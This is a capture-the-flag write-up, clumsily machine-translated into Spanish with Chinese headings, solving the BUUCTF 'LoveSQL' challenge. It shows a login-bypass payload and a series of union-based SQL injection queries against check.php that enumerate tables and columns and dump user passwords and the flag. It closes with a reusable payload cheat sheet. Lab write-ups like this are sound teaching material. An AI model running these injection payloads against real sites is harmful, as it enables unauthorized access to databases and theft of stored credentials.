[BUUCTF] [Geek Challenge 2019] LoveSQL
1. Sitio de prueba de inyección de SQL
Puntos de conocimiento básico
union 联合查询
information表
group_concat()
Proceso de inyeccion
1.万能密码登陆
2.登陆后,使用联合查询注入
3.爆字段
4.看回显
5.爆数据库
6.爆数据库的表
7.爆出表的列
8.爆出flag
2. Proceso de resolución de problemas
0. Hay inyección SQL
Agregue comillas simples para informar un error
/check.php?username=1'&password=2
/check.php?username=1&password=2'
/check.php?username=1'&password=2'
1. Contraseña universal admin 'o 1 = 1
O
1 ' o 1 = 1 #
账号
admin' or 1=1 #
密码
1
admin
47cb230740bc6725fd194aec8e479fc4
Consejos: ingrese el # en el cuadro, use directamente la barra de direcciones de la barra de hack, necesita codificar la URL del #, es decir, reemplácelo con% 23
2. Campo de ráfaga
check.php?username=admin ' order by 1 %23&password=1
check.php?username=admin ' order by 2 %23&password=1
check.php?username=admin ' order by 3 %23&password=1
check.php?username=admin ' order by 4 %23&password=1
Cambiar a 4, informar un error, hay 3 campos
Unknown column '4' in 'order clause'
3. Mira el eco
/check.php?username=1' union select 1,2,3%23&password=1
El punto de eco está en 2, 3
4. Destruye la base de datos
check.php?username=1' union select 1,database(),version()%23&password=1
Nombre de la base de datos:
versión geek : 10.3.18-MariaDB
5. Tablas de bases de datos en ráfagas
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1
Los nombres de las tablas de la base de datos son:
geekuser
l0ve1ysq1
Según el título, el nombre de la tabla debe ser l0ve1ysq1
6. Explota las columnas de la tabla.
/check.php?username=
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'
%23&password=1
/check.php?username=
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'
%23&password=1
7. Lee el contenido, explota la bandera
mesa de geekuser
/check.php?username=1' union select 1,2,group_concat(id,username,password) from geekuser%23&password=1
Cambiar una
tabla l0ve1ysq1
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
/check.php?username=1' union select 1,2,group_concat(username,0x40,password) from l0ve1ysq1 %23&password=1
/check.php?username=1' union select 1,2,group_concat(username,0x40,0x40,password) from l0ve1ysq1 %23&password=1
Your password is '1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{1cbf436f-3991-4300-9042-4f6c5f9e950f}'
Your password is 'cl4y@@wo_tai_nan_le,glzjin@@glzjin_wants_a_girlfriend,Z4cHAr7zCr@@biao_ge_dddd_hm,0xC4m3l@@linux_chuang_shi_ren,Ayrain@@a_rua_rain,Akko@@yan_shi_fu_de_mao_bo_he,fouc5@@cl4y,fouc5@@di_2_kuai_fu_ji,fouc5@@di_3_kuai_fu_ji,fouc5@@di_4_kuai_fu_ji,fouc5@@di_5_kuai_fu_ji,fouc5@@di_6_kuai_fu_ji,fouc5@@di_7_kuai_fu_ji,fouc5@@di_8_kuai_fu_ji,leixiao@@Syc_san_da_hacker,flag@@flag{2c52a50a-072c-4e80-aa81-3be3eddf604f}'
bandera {1cbf436f-3991-4300-9042-4f6c5f9e950f}
Tres, resumen de refinamiento
Campo de ráfaga
1' order by 1 #
1' order by 2 #
1' order by 3 #
1' order by 1 %23
1' order by 2 %23
1' order by 3 %23
Ver eco
1' union select 1,2,3 #
Base de datos de ráfagas
1' union select 1,database(),version() #
BASE DE DATOS, VERSIÓN
Tabla de base de datos de ráfagas
Solo hay una base de datos, lo que evita problemas y es directamente igual
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #
Varias bases de datos, seleccione una
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='DATABASE'
AAA, BBB, CCC
Columna de tabla de ráfagas
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='AAA' #
Leer contenido, bandera de explosión
Leer tabla AAA
1' union select 1,2,group_concat(id,username,password) from AAA%23&password=1
Se puede agregar código ASCII para una fácil distinción
1' union select 1,2,group_concat(username,0x40,password) from AAA%23&password=1